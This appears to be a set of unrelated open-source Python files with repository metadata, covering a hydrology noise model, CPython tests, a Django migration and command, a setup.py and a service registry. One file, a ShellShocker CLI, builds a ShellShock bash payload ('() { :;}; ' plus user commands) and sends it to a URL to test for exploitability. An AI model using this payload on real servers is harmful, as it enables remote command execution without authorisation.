"""ARMA(1,1) Noise model to simulate the noise as defined in.
[collenteur_2020]_.
Notes
-----
Calculates the noise according to:
.. math::
\\upsilon_t = r_t - r_{t-1} e^{-\\Delta t/\\alpha} - \\upsilon_{t-1}
e^{-\\Delta t/\\beta}
The units of the alpha and beta parameters are always in days.
Warnings
--------
This model has only been tested on regular time steps and should not be
used for irregular time steps yet.
References
----------
.. [collenteur_2020] Collenteur, R., Bakker, M., Klammler, G., and Birk,
S. (in review, 2020.) Estimating groundwater recharge from
groundwater levels using non-linear transfer function noise models
and comparison to lysimeter data, Hydrol. Earth Syst. Sci. Discuss.
https://doi.org/10.5194/hess-2020-392
"""
_name = "ArmaModel"
def __init__(self):
check_numba()
NoiseModelBase.__init__(self)
self.nparam = 2
self.set_init_parameters()
def set_init_parameters(self, oseries=None):
self.parameters.loc["noise_alpha"] = (10.0, 1e-9, np.inf, True,
"noise")
self.parameters.loc["noise_beta"] = (10.0, -np.inf, np.inf, True,
"noise")
def simulate(self, res, p):
alpha = p[0]
beta = p[1]
# Calculate the time steps
odelt = np.diff(res.index.to_numpy()) / Timedelta("1D")
a = self.calculate_noise(res.values, odelt, alpha, beta)
return Series(index=res.index, data=a, name="Noise")
@staticmethod
@njit
def calculate_noise(res, odelt, alpha, beta):
# Create an array to store the noise
a = np.zeros_like(res)
a[0] = res[0]
pm = beta / np.abs(beta)
# We have to loop through each value
for i in range(1, res.size):
a[i] = res[i] - res[i - 1] * np.exp(-odelt[i - 1] / alpha) - \
a[i - 1] * pm * np.exp(-odelt[i - 1] / np.abs(beta))
return a
| {
"content_hash": "80aaffd7aeab2f4a4c2939c77ce9f91a",
"timestamp": "",
"source": "github",
"line_count": 265,
"max_line_length": 79,
"avg_line_length": 30.10566037735849,
"alnum_prop": 0.5765856104286788,
"repo_name": "pastas/pasta",
"id": "8f421148af39631ba51e9b36fdd47f4cc06fd071",
"size": "7978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pastas/noisemodels.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "128118"
}
],
"symlink_target": ""
} |
"""This module includes tests of the code object representation.
>>> def f(x):
... def g(y):
... return x + y
... return g
...
>>> dump(f.func_code)
name: f
argcount: 1
names: ()
varnames: ('x', 'g')
cellvars: ('x',)
freevars: ()
nlocals: 2
flags: 3
consts: ('None', '<code object g>')
>>> dump(f(4).func_code)
name: g
argcount: 1
names: ()
varnames: ('y',)
cellvars: ()
freevars: ('x',)
nlocals: 1
flags: 19
consts: ('None',)
>>> def h(x, y):
... a = x + y
... b = x - y
... c = a * b
... return c
...
>>> dump(h.func_code)
name: h
argcount: 2
names: ()
varnames: ('x', 'y', 'a', 'b', 'c')
cellvars: ()
freevars: ()
nlocals: 5
flags: 67
consts: ('None',)
>>> def attrs(obj):
... print obj.attr1
... print obj.attr2
... print obj.attr3
>>> dump(attrs.func_code)
name: attrs
argcount: 1
names: ('attr1', 'attr2', 'attr3')
varnames: ('obj',)
cellvars: ()
freevars: ()
nlocals: 1
flags: 67
consts: ('None',)
>>> def optimize_away():
... 'doc string'
... 'not a docstring'
... 53
... 53L
>>> dump(optimize_away.func_code)
name: optimize_away
argcount: 0
names: ()
varnames: ()
cellvars: ()
freevars: ()
nlocals: 0
flags: 67
consts: ("'doc string'", 'None')
"""
import unittest
import weakref
import _testcapi
def consts(t):
"""Yield a doctest-safe sequence of object reprs."""
for elt in t:
r = repr(elt)
if r.startswith("<code object"):
yield "<code object %s>" % elt.co_name
else:
yield r
def dump(co):
"""Print out a text representation of a code object."""
for attr in ["name", "argcount", "names", "varnames", "cellvars",
"freevars", "nlocals", "flags"]:
print "%s: %s" % (attr, getattr(co, "co_" + attr))
print "consts:", tuple(consts(co.co_consts))
class CodeTest(unittest.TestCase):
def test_newempty(self):
co = _testcapi.code_newempty("filename", "funcname", 15)
self.assertEquals(co.co_filename, "filename")
self.assertEquals(co.co_name, "funcname")
self.assertEquals(co.co_firstlineno, 15)
class CodeWeakRefTest(unittest.TestCase):
def test_basic(self):
# Create a code object in a clean environment so that we know we have
# the only reference to it left.
namespace = {}
exec "def f(): pass" in globals(), namespace
f = namespace["f"]
del namespace
self.called = False
def callback(code):
self.called = True
# f is now the last reference to the function, and through it, the code
# object. While we hold it, check that we can create a weakref and
# deref it. Then delete it, and check that the callback gets called and
# the reference dies.
coderef = weakref.ref(f.__code__, callback)
self.assertTrue(bool(coderef()))
del f
self.assertFalse(bool(coderef()))
self.assertTrue(self.called)
def test_main(verbose=None):
from test.test_support import run_doctest, run_unittest
from test import test_code
run_doctest(test_code, verbose)
run_unittest(CodeTest, CodeWeakRefTest)
if __name__ == "__main__":
test_main()
| {
"content_hash": "6d8ec2a8ea35e3f85cdaa057ead29d51",
"timestamp": "",
"source": "github",
"line_count": 147,
"max_line_length": 80,
"avg_line_length": 21.816326530612244,
"alnum_prop": 0.5871531025880885,
"repo_name": "fkolacek/FIT-VUT",
"id": "e83a919bcf5b960157d2ba93bb46a876fff74fd3",
"size": "3207",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bp-revok/python/lib/python2.7/test/test_code.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "455326"
},
{
"name": "Awk",
"bytes": "8724"
},
{
"name": "Batchfile",
"bytes": "201"
},
{
"name": "Brainfuck",
"bytes": "83"
},
{
"name": "C",
"bytes": "5006938"
},
{
"name": "C++",
"bytes": "1835332"
},
{
"name": "CSS",
"bytes": "301045"
},
{
"name": "CoffeeScript",
"bytes": "46327"
},
{
"name": "Groff",
"bytes": "46766"
},
{
"name": "HTML",
"bytes": "937735"
},
{
"name": "Java",
"bytes": "552132"
},
{
"name": "JavaScript",
"bytes": "1742225"
},
{
"name": "Lua",
"bytes": "39700"
},
{
"name": "Makefile",
"bytes": "381793"
},
{
"name": "Objective-C",
"bytes": "4618"
},
{
"name": "PHP",
"bytes": "108701"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Perl",
"bytes": "60353"
},
{
"name": "Python",
"bytes": "22084026"
},
{
"name": "QMake",
"bytes": "2660"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Ragel in Ruby Host",
"bytes": "17993"
},
{
"name": "Ruby",
"bytes": "21607145"
},
{
"name": "Shell",
"bytes": "611321"
},
{
"name": "Tcl",
"bytes": "4920"
},
{
"name": "TeX",
"bytes": "561423"
},
{
"name": "VHDL",
"bytes": "49180"
},
{
"name": "Visual Basic",
"bytes": "481"
},
{
"name": "XSLT",
"bytes": "154638"
},
{
"name": "Yacc",
"bytes": "32788"
}
],
"symlink_target": ""
} |
"""
ShellShocker CLI
================
The CLI for ShellShocker.
Interfaces to **shellshocker.exploits.ShellShocker**, a ShellShock exploiter
"""
from shellshocker.exploits import ShellShocker # Import a shellshock payload generator
# and delivery device.
import click # Click is Armin Ronacher's new CLI framework. It's awesomesauce.
@click.command()
@click.argument('url')
@click.option('-v', '--verbose', is_flag=True, help='Make the tester more verbose for debugging')
@click.option('-c', '--commands', help='Command to inject into the payload')
@click.option('-p', '--payload', type=click.Choice(['traditional', 'new']), help='Choose between the original bug and the new one')
def test_site(url, verbose, commands, payload):
"""
Test the URL `URL` for ShellShock vulnerability.
"""
click.echo("Testing {url} with a standard payload using ShellShocker".format(url=url))
if verbose:
click.echo("Creating instance of exploit on {url}".format(url=url))
if commands is not None:
click.echo("Using commands {commands}".format(commands=commands))
else:
click.echo("Using default commands")
if payload is not None:
click.echo("Using the {payload} payload".format(payload=payload))
else:
click.echo("Using default payload")
if payload == 'traditional':
payloadstring = '() {{ :;}}; {commands}'
elif payload == 'new':
raise NotImplementedError("Not supported yet")
else:
payloadstring = '() {{ :;}}; {commands}'
# Create a instance of the exploiter
shocker = ShellShocker({'url': url, 'commands': commands, 'payload': payloadstring})
if verbose:
shocker.verbose = True
if verbose:
click.echo("Sending exploit to {url}".format(url=url))
# Is it exploitable?
exploitable = shocker.exploitable()
click.echo(click.style("{url} is exploitable".format(url=url), fg="red") if exploitable else click.style("{url} is not exploitable".format(url=url), fg="green"))
if __name__ == '__main__':
"""
If this is being run as a script
"""
test_site()
| {
"content_hash": "048ac531e3cebdd2c909d50cec2be756",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 163,
"avg_line_length": 34.03333333333333,
"alnum_prop": 0.6816846229187071,
"repo_name": "ArchimedesPi/shellshocker",
"id": "ae8e1f431f05542dd894a0bee4c844de25b54f56",
"size": "2065",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "shellshocker.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "81412"
},
{
"name": "HTML",
"bytes": "5372"
},
{
"name": "Handlebars",
"bytes": "341"
},
{
"name": "JavaScript",
"bytes": "5912"
},
{
"name": "Python",
"bytes": "10131"
},
{
"name": "Shell",
"bytes": "64"
}
],
"symlink_target": ""
} |
from common.ulam_spiral import *
from common.primes import *
SIEVE = PrimeSieve(100000)
def prime_ratio_below(limit):
corners_seen = 1
primes_seen = 0
n = 3
for corners in ulam_spiral_corners_except_center():
primes_seen += len(filter(is_prime, corners))
corners_seen += len(corners)
if float(primes_seen)/corners_seen < limit:
return n
n += 2 | {
"content_hash": "3ba1fef121ce521da103c3cc0ae8e1ff",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 55,
"avg_line_length": 25.375,
"alnum_prop": 0.625615763546798,
"repo_name": "plilja/project-euler",
"id": "f7db7bfa289d2983d0e1777a4c0c95ca7c7c3081",
"size": "406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "problem_58/prime_diagonals.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "149781"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Subquery'
db.create_table('smra_portal_subquery', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('owned_by', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['smra_portal.UserProfile'])),
('part_of', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['smra_portal.VirtualCollection'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=80)),
('query', self.gf('django.db.models.fields.CharField')(max_length=2048)),
))
db.send_create_signal('smra_portal', ['Subquery'])
def backwards(self, orm):
# Deleting model 'Subquery'
db.delete_table('smra_portal_subquery')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'smra_portal.deadlink': {
'Meta': {'object_name': 'DeadLink'},
'date_accessed': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parameter': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['smra_portal.MediaObjectParameter']", 'unique': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '400'})
},
'smra_portal.key': {
'Meta': {'ordering': "['ident']", 'object_name': 'Key'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '400'}),
'media_object': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['smra_portal.MediaObject']", 'unique': 'True'}),
'repos': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Repository']"})
},
'smra_portal.mediaobject': {
'Meta': {'object_name': 'MediaObject'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'repos': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Repository']"}),
'schemas': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['smra_portal.Schema']", 'through': "orm['smra_portal.MediaObjectParameterSet']", 'symmetrical': 'False'})
},
'smra_portal.mediaobjectparameter': {
'Meta': {'ordering': "('name',)", 'object_name': 'MediaObjectParameter'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.ParameterName']"}),
'paramset': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.MediaObjectParameterSet']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'smra_portal.mediaobjectparameterset': {
'Meta': {'ordering': "['-ranking']", 'object_name': 'MediaObjectParameterSet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media_object': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.MediaObject']"}),
'ranking': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'schema': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Schema']"})
},
'smra_portal.parametername': {
'Meta': {'ordering': "['-ranking']", 'object_name': 'ParameterName'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'ranking': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'schema': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.Schema']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
'smra_portal.repository': {
'Meta': {'object_name': 'Repository'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.System']"})
},
'smra_portal.schema': {
'Meta': {'object_name': 'Schema'},
'description': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SlugField', [], {'default': "''", 'max_length': '50', 'db_index': 'True'}),
'namespace': ('django.db.models.fields.URLField', [], {'max_length': '400'})
},
'smra_portal.subquery': {
'Meta': {'object_name': 'Subquery'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owned_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.UserProfile']"}),
'part_of': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.VirtualCollection']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '2048'})
},
'smra_portal.system': {
'Meta': {'object_name': 'System'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'smra_portal.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'smra_portal.virtualcollection': {
'Meta': {'object_name': 'VirtualCollection'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'owned_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['smra_portal.UserProfile']"})
}
}
complete_apps = ['smra_portal']
| {
"content_hash": "f2787b79132eb77b12e0731d892d319f",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 196,
"avg_line_length": 68.35570469798658,
"alnum_prop": 0.5501227295041728,
"repo_name": "tectronics/mavrec",
"id": "2c184261b9634e7182ad7962e8c1912aae724b59",
"size": "10203",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "smra/smra_portal/migrations/0016_auto__add_subquery.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "30199"
},
{
"name": "HTML",
"bytes": "42761"
},
{
"name": "JavaScript",
"bytes": "10786"
},
{
"name": "Python",
"bytes": "875078"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages # Always prefer setuptools over distutils
from codecs import open # To use a consistent encoding
from os import path
import io
NAME = "python-constraint"
filename = "%s/version.py" % "constraint"
with open(filename) as f:
exec(f.read())
here = path.abspath(path.dirname(__file__))
def readme():
filename = path.join(here, "README.rst")
with io.open(filename, "rt", encoding="UTF-8") as f:
return f.read()
setup(
name=NAME,
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/development.html#single-sourcing-the-version
# version='0.0.1',
version=__version__,
description="python-constraint is a module implementing support "
"for handling CSPs (Constraint Solving Problems) over finite domain",
long_description=readme(),
# The project's main homepage.
url=__url__,
# Author details
author=__author__,
author_email=__email__,
# Choose your license
license=__license__,
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
# Indicate who your project is intended for
"Environment :: Console",
# 'Topic :: Software Development :: Build Tools',
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
"Programming Language :: Cython",
"Programming Language :: Python",
# 'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.6',
"Programming Language :: Python :: 2.7",
# 'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.2',
# "Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: BSD License",
],
# What does your project relate to?
keywords="csp constraint solving problems problem solver",
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=["contrib", "docs", "tests*"]),
# List run-time dependencies here. These will be installed by pip when your
# project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files
install_requires=[],
# List additional groups of dependencies here (e.g. development dependencies).
# You can install these using the following syntax, for example:
# $ pip install -e .[dev,test]
extras_require={"dev": ["check-manifest", "nose"], "test": ["coverage", "nose"]},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['logging.conf'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# see http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
| {
"content_hash": "610513dd2a6ae23e61368a6a533aa073",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 98,
"avg_line_length": 43.62626262626262,
"alnum_prop": 0.651308173188238,
"repo_name": "python-constraint/python-constraint",
"id": "77b02534f5880d1da34645aa7123d04d987ff7fe",
"size": "4366",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "63031"
}
],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand
from optparse import make_option
from provisioning import okta
from provisioning.models import Okta
from litedesk.lib.airwatch import user
from litedesk.lib.airwatch import group
from provisioning.models import AirWatch
import json
class Command(BaseCommand):
help = 'Get information about a user.'
option_list = BaseCommand.option_list + (
make_option('--username',
default="bruce.wayne",
help='Username to find. Default="bruce.wayne"'),
)
def handle(self, *args, **options):
result = {'okta': {}, 'airwatch': {}}
okta_service = Okta.objects.get(tenant=1)
client = okta_service.get_client()
okta_user = client.get(okta.User, options["username"] + '@zeile12.de')
if okta_user:
# self.stdout.write("got the Okta user with the id")
result['okta']['id'] = okta_user.id
result['okta']['status'] = okta_user.status
result['okta']['applications'] = []
okta_apps = client.user_applications(okta_user)
for app in okta_apps:
result['okta']['applications'].append(app['name'])
airwatch_service = AirWatch.objects.get(tenant=1)
airwatch_client = airwatch_service.get_client()
airwatch_user = user.User.get_remote(airwatch_client, options["username"])
if airwatch_user is not None:
result['airwatch']['id'] = airwatch_user.id
result['airwatch']['Status'] = airwatch_user.Status
result['airwatch']['applications'] = []
# aw_assets = airwatch_service.airwatch.tenantserviceasset_set.all()
# for asset in aw_assets:
# smartgroup_id = asset.metadata['smartgroup_id']
# if options["username"] in (
# user['Name'] for user in group.SmartGroup.get_remote(
# airwatch_client, smartgroup_id
# ).UserAdditions
# ):
# result['airwatch']['applications'].append(asset.asset.name)
self.stdout.write(json.dumps(result))
| {
"content_hash": "442c950b07bc3d5a43bd06ce5f59d47f",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 82,
"avg_line_length": 45.333333333333336,
"alnum_prop": 0.5946691176470589,
"repo_name": "litedesk/litedesk-webserver-provision",
"id": "96309fa61b40e5f914798aa872beed33e82ee420",
"size": "2833",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/tenants/management/commands/get_user.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "203433"
},
{
"name": "Shell",
"bytes": "2421"
}
],
"symlink_target": ""
} |
import logging
import signal
import asyncio
from functools import partial
from collections import defaultdict, namedtuple
from .utils.log import config_logs
from .packet import ControlPacket
from .protocol_factory import get_vyked_protocol
from .pinger import TCPPinger, HTTPPinger
from .utils.log import setup_logging
Service = namedtuple('Service', ['name', 'version', 'dependencies', 'host', 'port', 'node_id', 'type'])
logger = logging.getLogger(__name__)
class Repository:
def __init__(self):
self._registered_services = defaultdict(list)
self._pending_services = defaultdict(list)
self._service_dependencies = {}
self._subscribe_list = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
def register_service(self, service: Service):
service_name = self._get_full_service_name(service.name, service.version)
service_entry = (service.host, service.port, service.node_id, service.type)
self._registered_services[service_name].append(service_entry)
self._pending_services[service_name].append(service.node_id)
if len(service.dependencies):
if self._service_dependencies.get(service_name) is None:
self._service_dependencies[service_name] = service.dependencies
def add_pending_service(self, service, version, node_id):
self._pending_services[self._get_full_service_name(service, version)].append(node_id)
def get_pending_services(self):
return [self._split_key(k) for k in self._pending_services.keys()]
def get_pending_instances(self, service, version):
return self._pending_services.get(self._get_full_service_name(service, version), [])
def remove_pending_instance(self, service, version, node_id):
self.get_pending_instances(service, version).remove(node_id)
if not len(self.get_pending_instances(service, version)):
self._pending_services.pop(self._get_full_service_name(service, version))
def get_instances(self, service, version):
service_name = self._get_full_service_name(service, version)
return self._registered_services.get(service_name, [])
def get_consumers(self, service_name, service_version):
consumers = set()
for service, vendors in self._service_dependencies.items():
for each in vendors:
if each['service'] == service_name and each['version'] == service_version:
consumers.add(self._split_key(service))
return consumers
def get_vendors(self, service, version):
return self._service_dependencies.get(self._get_full_service_name(service, version), [])
def get_node(self, node_id):
for service, instances in self._registered_services.items():
for host, port, node, service_type in instances:
if node_id == node:
name, version = self._split_key(service)
return Service(name, version, [], host, port, node, service_type)
return None
def remove_node(self, node_id):
for service, instances in self._registered_services.items():
for instance in instances:
host, port, node, service_type = instance
if node_id == node:
instances.remove(instance)
return None
def xsubscribe(self, service, version, host, port, node_id, endpoints):
entry = (service, version, host, port, node_id)
for endpoint in endpoints:
self._subscribe_list[endpoint['service']][endpoint['version']][endpoint['endpoint']].append(entry + (endpoint['strategy'],))
def get_subscribers(self, service, version, endpoint):
return self._subscribe_list[service][version][endpoint]
@staticmethod
def _get_full_service_name(service: str, version):
return '{}/{}'.format(service, version)
@staticmethod
def _split_key(key: str):
return tuple(key.split('/'))
class Registry:
def __init__(self, ip, port, repository):
self._ip = ip
self._port = port
self._loop = asyncio.get_event_loop()
self._client_protocols = {}
self._service_protocols = {}
self._repository = repository
self._pingers = {}
def start(self):
setup_logging("registry")
self._loop.add_signal_handler(getattr(signal, 'SIGINT'), partial(self._stop, 'SIGINT'))
self._loop.add_signal_handler(getattr(signal, 'SIGTERM'), partial(self._stop, 'SIGTERM'))
registry_coroutine = self._loop.create_server(partial(get_vyked_protocol, self), self._ip, self._port)
server = self._loop.run_until_complete(registry_coroutine)
try:
self._loop.run_forever()
except Exception as e:
print(e)
finally:
server.close()
self._loop.run_until_complete(server.wait_closed())
self._loop.close()
def _stop(self, signame: str):
print('\ngot signal {} - exiting'.format(signame))
self._loop.stop()
def receive(self, packet: dict, protocol, transport):
request_type = packet['type']
if request_type == 'register':
self.register_service(packet, protocol, *transport.get_extra_info('peername'))
elif request_type == 'get_instances':
self.get_service_instances(packet, protocol)
elif request_type == 'xsubscribe':
self._xsubscribe(packet)
elif request_type == 'get_subscribers':
self.get_subscribers(packet, protocol)
elif request_type == 'pong':
self._ping(packet)
elif request_type == 'ping':
self._pong(packet, protocol)
def deregister_service(self, node_id):
service = self._repository.get_node(node_id)
self._repository.remove_node(node_id)
if service is not None:
self._service_protocols.pop(node_id, None)
self._client_protocols.pop(node_id, None)
self._notify_consumers(service.name, service.version, node_id)
if not len(self._repository.get_instances(service.name, service.version)):
consumers = self._repository.get_consumers(service.name, service.version)
for consumer_name, consumer_version in consumers:
for _, _, node_id, _ in self._repository.get_instances(consumer_name, consumer_version):
self._repository.add_pending_service(consumer_name, consumer_version, node_id)
def register_service(self, packet: dict, registry_protocol, host, port):
params = packet['params']
service = Service(params['service'], params['version'], params['vendors'], host, params['port'],
params['node_id'], params['type'])
self._repository.register_service(service)
self._client_protocols[params['node_id']] = registry_protocol
self._connect_to_service(host, params['port'], params['node_id'], params['type'])
self._handle_pending_registrations()
def _send_activated_packet(self, service, version, node):
protocol = self._client_protocols[node]
packet = self._make_activated_packet(service, version)
protocol.send(packet)
def _handle_pending_registrations(self):
for service, version in self._repository.get_pending_services():
vendors = self._repository.get_vendors(service, version)
should_activate = True
for vendor in vendors:
if not len(self._repository.get_instances(vendor['service'], vendor['version'])):
should_activate = False
break
for node in self._repository.get_pending_instances(service, version):
if should_activate:
self._send_activated_packet(service, version, node)
self._repository.remove_pending_instance(service, version, node)
logger.info('%s activated', (service, version))
else:
logger.info('%s can\'t register because it depends on %s', (service, version), vendor)
def _make_activated_packet(self, service, version):
vendors = self._repository.get_vendors(service, version)
instances = {
(vendor['service'], vendor['version']): self._repository.get_instances(vendor['service'], vendor['version']) for
vendor in vendors}
return ControlPacket.activated(instances)
def _connect_to_service(self, host, port, node_id, service_type):
if service_type == 'tcp':
coroutine = self._loop.create_connection(partial(get_vyked_protocol, self), host, port)
future = asyncio.async(coroutine)
future.add_done_callback(partial(self._handle_service_connection, node_id))
elif service_type == 'http':
pinger = HTTPPinger(node_id, host, port, self)
self._pingers[node_id] = pinger
pinger.ping()
def _handle_service_connection(self, node_id, future):
transport, protocol = future.result()
self._service_protocols[node_id] = protocol
pinger = TCPPinger(node_id, protocol, self)
self._pingers[node_id] = pinger
pinger.ping()
def _notify_consumers(self, service, version, node_id):
packet = ControlPacket.deregister(service, version, node_id)
for consumer_name, consumer_version in self._repository.get_consumers(service, version):
for host, port, node, service_type in self._repository.get_instances(consumer_name, consumer_version):
